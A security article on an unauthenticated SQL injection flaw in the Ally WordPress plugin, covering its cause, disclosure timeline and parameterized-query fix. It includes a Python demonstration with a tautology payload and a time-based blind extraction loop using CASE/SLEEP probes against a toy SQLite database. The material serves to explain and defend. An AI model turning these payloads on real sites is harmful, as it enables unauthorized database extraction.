Critical SQL Injection Bug in Ally Plugin Threatens 400,000+ WordPress Sites

On February 4, 2026, an unauthenticated SQL injection flaw in the Ally WordPress plugin was discovered, putting more than 400,000 websites at risk. The vulnerability, tracked as CVE-2026-2413 with a CVSS score of 7.5 (High), lets an attacker with no account on the site extract sensitive data from its database. In this article, we look at the details of the vulnerability, its impact, and the measures taken to address it.

The Ally WordPress plugin, formerly known as One Click Accessibility, is a free plugin maintained by Elementor and installed on more than 400,000 websites. It offers an accessibility scanner with AI suggestions, a usability widget for visitors, and an automated accessibility statement generator. The vulnerability stems from how the plugin builds one of its database queries: a page URL parameter is concatenated into a SQL JOIN clause without being escaped for SQL context or bound as a query parameter.

The issue was responsibly reported by Drew Webber, an offensive security engineer at Acquia, through the Wordfence Bug Bounty Program, earning an $800 bounty. Wordfence notified Elementor on February 13, and the vendor acknowledged the report on February 15. A patch was released on February 23, 2026, in Ally version 4.1.0. Users are urged to update to 4.1.0 or later to mitigate the risk.

The root cause is insufficient escaping of the user-supplied URL parameter in the `get_global_remediations()` method, where the value is concatenated directly into a SQL JOIN clause. `esc_url_raw()` is applied to it, but that function only sanitizes the value as a URL; it leaves SQL metacharacters such as single quotes and parentheses in place, so a crafted URL can close the string literal and append arbitrary SQL. The reported exploitation technique is time-based blind SQL injection: CASE expressions that call SLEEP() only when a guessed condition about the data holds, letting the attacker extract database contents one character at a time by measuring response delays.

To exploit the vulnerability, an attacker needs only to manipulate the page URL parameter; no authentication is required. The developers fixed the issue by building the JOIN clause with `$wpdb->prepare()`, which passes the URL through a placeholder so that it is escaped for SQL and can no longer change the structure of the query. Note that `$wpdb->prepare()` only protects values supplied through its placeholders (`%s`, `%d`, `%f`); a value interpolated into the format string itself remains injectable.
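The following is an added example that models the bug pattern and the fix described above; it is not code from the Ally plugin or from Wordfence. It is written in Python against an in-memory SQLite database rather than PHP/MySQL so that it runs stand-alone: `esc_url_raw_like()` is an approximation of the WordPress `esc_url()` character whitelist in database context, parameter binding stands in for `$wpdb->prepare()`, and `SLEEP()` is registered as a user-defined function so the time-based blind extraction can be shown end to end. The table and column names, the sample rows, and the `secret` value are all constructed for the demonstration and are not the plugin's schema.

```python
"""Model of an esc_url_raw()-then-concatenate SQL injection and its parameterized fix.
Hypothetical schema and data; see the lead-in for what is assumed."""
import re
import sqlite3
import string
import time

DELAY = 0.15           # seconds the injected SLEEP() pauses per true guess
THRESHOLD = DELAY / 2  # a response slower than this is read as a "true" oracle answer


def esc_url_raw_like(url: str) -> str:
    """Approximation of WordPress esc_url() in 'db' context: spaces become %20 and
    characters outside the URL whitelist are dropped. Quotes, parentheses, '=' and
    '*' are all kept, which is why this is not an SQL escape."""
    url = url.strip().replace(" ", "%20")
    return re.sub(r"[^a-z0-9\-~+_.?#=!&;,/:%@$|*'()\[\]\x80-\xff]", "", url, flags=re.I)


def build_db() -> sqlite3.Connection:
    """Constructed sample tables standing in for the plugin's data."""
    conn = sqlite3.connect(":memory:")
    # SQLite has no SLEEP(); register one so the MySQL-style payload works here
    conn.create_function("SLEEP", 1, lambda s: time.sleep(float(s)) or 0)
    conn.executescript("""
        CREATE TABLE pages (id INTEGER PRIMARY KEY, url TEXT);
        CREATE TABLE remediations (id INTEGER PRIMARY KEY, page_id INTEGER, rule TEXT, active INTEGER);
        CREATE TABLE settings (secret TEXT);
        INSERT INTO pages VALUES (1, 'http://example.com/'), (2, 'http://example.com/about');
        INSERT INTO remediations VALUES (1, 1, 'alt-text', 1), (2, 2, 'contrast', 1), (3, 2, 'label', 0);
        INSERT INTO settings VALUES ('admin');
    """)
    return conn


VULNERABLE_SQL = ("SELECT r.id, r.rule FROM remediations r "
                  "JOIN pages p ON p.id = r.page_id AND p.url = '%s' "
                  "WHERE r.active = 1")
SAFE_SQL = VULNERABLE_SQL.replace("'%s'", "?")  # same query, value bound as a parameter


def global_remediations_vulnerable(conn, url):
    """The bug pattern: URL-escaped, then string-concatenated into the JOIN clause."""
    return conn.execute(VULNERABLE_SQL % esc_url_raw_like(url)).fetchall()


def global_remediations_safe(conn, url):
    """The fix pattern: same escaping, but the value goes through a placeholder."""
    return conn.execute(SAFE_SQL, (esc_url_raw_like(url),)).fetchall()


# /**/ stands in for spaces, which the URL filter would otherwise turn into %20
TAUTOLOGY = "http://example.com/'/**/OR/**/1=1/**/OR/**/'"


def time_probe(position: int, guess: str) -> str:
    """URL that makes the database pause only if the guessed character is right.
    Same CASE ... SLEEP() shape as the article describes; MySQL would use SUBSTRING()."""
    return ("http://example.com/'/**/OR/**/(CASE/**/WHEN/**/SUBSTR((SELECT/**/secret/**/FROM/**/settings),"
            "%d,1)='%s'/**/THEN/**/SLEEP(%s)/**/ELSE/**/0/**/END)/**/OR/**/'" % (position, guess, DELAY))


def extract_secret(conn, length: int, alphabet: str = string.ascii_lowercase + string.digits) -> str:
    """Time-based blind extraction through the vulnerable code path, one character at a time."""
    found = ""
    for pos in range(1, length + 1):
        for ch in alphabet:
            start = time.monotonic()
            global_remediations_vulnerable(conn, time_probe(pos, ch))
            if time.monotonic() - start > THRESHOLD:
                found += ch
                break
        else:
            break  # no character matched: end of the value (or the oracle failed)
    return found


if __name__ == "__main__":
    db = build_db()
    print("filter leaves payload intact:", esc_url_raw_like(TAUTOLOGY) == TAUTOLOGY)
    print("vulnerable, tautology:", global_remediations_vulnerable(db, TAUTOLOGY))
    print("safe, tautology:", global_remediations_safe(db, TAUTOLOGY))
    print("first 3 chars of secret via timing:", extract_secret(db, 3))
```

The tautology payload passes the URL filter unchanged and turns the JOIN condition into `... OR 1=1 OR ''`, so the vulnerable path returns every active remediation for every page, while the parameterized path treats the whole string as a URL that matches nothing. The timing probe returns the same rows as a legitimate request either way; only its duration leaks information, which is what makes the real bug exploitable without any output being reflected.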

The fix shipped in Ally version 4.1.0, which is now the recommended version. As the advisory published by Wordfence states, "The Ally – Web Accessibility & Usability plugin for WordPress is vulnerable to SQL Injection via the URL path in all versions up to, and including, 4.0.3." Site owners should confirm the installed version from the Plugins screen in the WordPress admin or, on the command line, with WP-CLI's `wp plugin list`, and update to 4.1.0 or later as soon as possible, given that the flaw is exploitable without authentication.

In conclusion, the SQL injection bug in the Ally plugin highlights the importance of regular security audits and vulnerability testing for WordPress plugins, and in particular of treating URL sanitization and SQL escaping as separate problems. It also shows the value of responsible disclosure and coordination between researchers, developers, and vendors in getting identified vulnerabilities fixed quickly. By staying informed about current threats and keeping plugins up to date, WordPress site owners can minimize the risk of data breaches.